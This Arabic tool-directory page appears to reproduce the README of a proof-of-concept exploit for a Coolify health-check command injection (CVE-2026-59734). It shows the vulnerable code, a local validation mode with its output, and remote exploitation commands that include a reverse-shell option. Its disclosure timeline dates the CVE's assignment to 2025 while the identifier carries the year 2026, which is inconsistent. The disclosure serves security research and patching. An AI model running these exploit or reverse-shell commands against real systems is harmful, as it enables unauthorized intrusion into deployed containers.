Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-59734-POC — حقن أوامر نظام التشغيل في فحص الصحة ← تنفيذ التعليمات البرمجية عن بُعد | Kitploit
أدوات/GitHubGitHub/cybertechajju/cve-2026-59734-poc
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالقيادة والسيطرةالتعلم والتعليمتطوير الحمولات
GitHubcybertechajju/cve-2026-59734-poc

CVE-2026-59734-POC

حقن أوامر نظام التشغيل في فحص الصحة ← تنفيذ التعليمات البرمجية عن بُعد

عرض المستودع
2منذ 2 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
هاكر غليتش

🚨 CVE-2026-59734 — استغلال RCE في Coolify

حقن أوامر نظام التشغيل في فحص الصحة → تنفيذ التعليمات البرمجية عن بُعد

CVE CVSS Advisory Patched Author


Medium Writeup

YouTube



إثبات مفهوم لاستغلال حقن أوامر نظام التشغيل في إعداد فحص الصحة في Coolify.
يمكن لأي مستخدم مُصادَق تنفيذ أوامر عشوائية داخل الحاويات المنشورة.


🎯 حول الثغرة

Coolify هو منصة نشر شهيرة مفتوحة المصدر وذاتية الاستضافة (أكثر من 30 ألف نجمة على GitHub) — بديل مجاني لـ Heroku وVercel وNetlify.

تم اكتشاف ثغرة حرجة من نوع حقن أوامر نظام التشغيل في إعداد فحص الصحة في Coolify. يتم إقحام المعاملات health_check_host وhealth_check_method وhealth_check_path مباشرةً في أوامر الصدفة بدون أي تعقيم، مما يسمح لأي مستخدم مُصادَق بتنفيذ أوامر عشوائية داخل حاويات النشر.

root@kitploit:~
┌──────────────────┬──────────────────────────────────────┐
│ CVE ID           │ CVE-2026-59734                       │
│ Type             │ OS Command Injection (CWE-78)        │
│ Severity         │ HIGH — CVSS 8.8                      │
│ Attack Vector    │ Network (Authenticated)              │
│ Affected         │ Coolify <= v4.0.0-beta.460           │
│ Fixed In         │ Coolify >= v4.0.0-beta.469           │
│ Fix Commit       │ 23f9156c7                            │
│ Reporter         │ CyberTechAjju                        │
└──────────────────┴──────────────────────────────────────┘
🔥 الكود المُعرَّض للثغرة (اضغط للتوسيع)
root@kitploit:~
// app/Jobs/ApplicationDeploymentJob.php — generate_healthcheck_commands()

// ⚠️ User input directly in shell command — NO escapeshellarg()!
$generated_healthchecks_commands = [
    "curl -s -X {$this->application->health_check_method} -f " .
    "{$this->application->health_check_scheme}://" .
    "{$this->application->health_check_host}:" .
    "{$health_check_port}" .
    "{$this->application->health_check_path} > /dev/null || exit 1",
];

🛠️ ماذا تفعل هذه الأداة

يتحقق سكربت PoC هذا من CVE-2026-59734 ويستغلها بوضعين:

الوضعالوصفالخطورة
--localيحاكي نمط الكود المُعرَّض للثغرة دون اتصال. بدون أي طلبات شبكة. يختبر جميع المعاملات الثلاثة القابلة للحقن + يتحقق من الإصلاح.✅ آمن
--remoteيستغل مثيل Coolify حقيقيًا عبر API. يحقن الحمولة في إعداد فحص الصحة ويُطلق عملية النشر.⚠️ يتطلب مصادقة

الميزات

  • 🧪 4 اختبارات محلية — تتحقق من الحقن عبر host وmethod وpath + تؤكد أن إصلاح escapeshellarg() يعمل
  • 🔑 التحقق من المصادقة — يتحقق من رمز API والصلاحيات قبل محاولة الاستغلال
  • 📋 كشف الإصدار — يكتشف إصدار Coolify ويحذّر إذا كان مُصلَّحًا بالفعل
  • 🎯 رموز الإثبات — يستخدم رموزًا فريدة لمنع النتائج الإيجابية الكاذبة
  • 🐚 وضع الصدفة العكسية — حمولة صدفة عكسية مدمجة مع --lhost / --lport
  • 🧹 وضع التنظيف — يستعيد إعداد فحص الصحة الأصلي بعد الاستغلال
  • 🛡️ التحقق من الحقن — يؤكد أن الخادم خزّن الحمولة دون تعقيم

⚡ بداية سريعة

التحقق المحلي (آمن وبدون اتصال)

root@kitploit:~
git clone https://github.com/cybertechajju/CVE-2026-59734.git
cd CVE-2026-59734
chmod +x coolify_healthcheck_rce_poc.sh

# Run safe local validation
./coolify_healthcheck_rce_poc.sh --local

المخرجات المتوقعة:

root@kitploit:~
═══ LOCAL VULNERABILITY PATTERN VALIDATION ═══

┌─ Test 1: health_check_host injection
│  ✅ VULNERABLE — Injected command executed successfully

┌─ Test 2: health_check_method injection
│  ✅ VULNERABLE — Method parameter also injectable

┌─ Test 3: health_check_path injection
│  ✅ VULNERABLE — Path parameter also injectable

┌─ Test 4: Verify that escapeshellarg() fixes the issue
│  ✅ SAFE — Sanitized input prevents injection

الاستغلال عن بُعد (لأغراض الاختبار المصرح بها فقط)

root@kitploit:~
# Basic PoC — writes proof file inside the container
./coolify_healthcheck_rce_poc.sh --remote \
  --url https://your-coolify-instance:3000 \
  --token YOUR_API_TOKEN \
  --uuid YOUR_APP_UUID

# Reverse shell
./coolify_healthcheck_rce_poc.sh --remote \
  --url https://your-coolify-instance:3000 \
  --token YOUR_API_TOKEN \
  --uuid YOUR_APP_UUID \
  --lhost YOUR_IP \
  --lport 4444

# With auto-cleanup (restores original config after exploit)
./coolify_healthcheck_rce_poc.sh --remote \
  --url https://your-coolify-instance:3000 \
  --token YOUR_API_TOKEN \
  --uuid YOUR_APP_UUID \
  --cleanup

📋 جميع الخيارات

root@kitploit:~
Usage:

  Local Validation (safe, offline):
    ./coolify_healthcheck_rce_poc.sh --local

  Remote Exploit (requires auth):
    ./coolify_healthcheck_rce_poc.sh --remote --url <URL> --token <TOKEN> --uuid <UUID> [OPTIONS]

Options:
  --url       Coolify instance URL (e.g. https://coolify.example.com)
  --token     API Bearer token
  --uuid      Target application UUID
  --payload   Custom injection payload
  --lhost     Attacker IP for reverse shell
  --lport     Attacker port for reverse shell (default: 4444)
  --cleanup   Restore original config after exploit

🔍 كيفية الحصول على رمز API ومعرّف التطبيق UUID

رمز API:

  1. سجّل الدخول إلى لوحة تحكم Coolify
  2. انتقل إلى الإعدادات → API Tokens
  3. أنشئ رمزًا جديدًا

معرّف التطبيق UUID:

root@kitploit:~
curl -s https://YOUR-COOLIFY/api/v1/applications \
  -H "Authorization: Bearer YOUR_TOKEN" | jq '.[].uuid'

📖 الشرح الكامل

لقد كتبت مقالًا تفصيليًا يشرح عملية الاكتشاف والاستغلال والدروس المستفادة بالكامل:

🔗 كيف اكتشفت ثغرة حقن أوامر نظام التشغيل (RCE) في Coolify — Medium


🎥 شرح بالفيديو

شاهد العرض التوضيحي الكامل لعملية الاستغلال على YouTube:

🔗 CVE-2026-59734 — عرض توضيحي لاستغلال RCE في Coolify — YouTube


✅ الجدول الزمني

التاريخالحدث
6 يناير 2025🔍 تم الاكتشاف والإبلاغ عبر GitHub Security Advisory
16 يناير 2025✅ تم قبول التقرير من قِبل مُطوّر Coolify
24 فبراير 2025🔬 تم تأكيد التحقيق
18 مارس 2025🔧 تم إيداع الإصلاح (23f9156c7)
12 أبريل 2025📦 تم إصدار الإصلاح في v4.0.0-beta.469
يوليو 2025🏷️ تم تعيين CVE-2026-59734 ونشر الاستشارة الأمنية

⚠️ إخلاء المسؤولية القانوني

هذه الأداة مقدمة للأغراض التعليمية ولاختبار الأمن المصرح به فقط.

إثبات المفهوم هذا موجه لباحثي الأمن وصيادي مكافآت الثغرات لاختبار الأنظمة التي لديهم إذن صريح وموثّق لتدقيقها. الاستخدام غير المصرح به ضد الأنظمة التي لا تملكها ممنوع منعًا باتًا وقد ينتهك القوانين المحلية والولائية والاتحادية.

المؤلف (CyberTechAjju) لا يتحمل أي مسؤولية ولا يعتبر مسؤولًا عن أي إساءة استخدام أو ضرر ناتج عن هذه الأداة.


🏆 المزيد من CVEs من CyberTechAjju

CVEالهدفالنوعالخطورة
CVE-2026-45156Nextcloud user_oidcتجاوز توقيع JWT🔴 حرجة (9.8)
CVE-2026-59734Coolifyحقن أوامر نظام التشغيل🟠 عالية (8.8)

Medium YouTube GitHub



"لقد نسوا التعقيم، لكنني لم أنسَ الإبلاغ."
🇮🇳 اخترق الكوكب. 🌎💻

تنزيل الأداة